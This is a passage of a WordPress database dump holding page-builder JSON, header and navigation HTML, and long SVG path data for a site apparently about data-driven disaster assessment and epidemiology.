Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:44:20','2022-02-16 15:44:20','',23,'https://gsudice.dataconn.net/?p=324',0,'revision','',0),(325,1,'2022-02-16 15:44:20','2022-02-16 15:44:20','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path 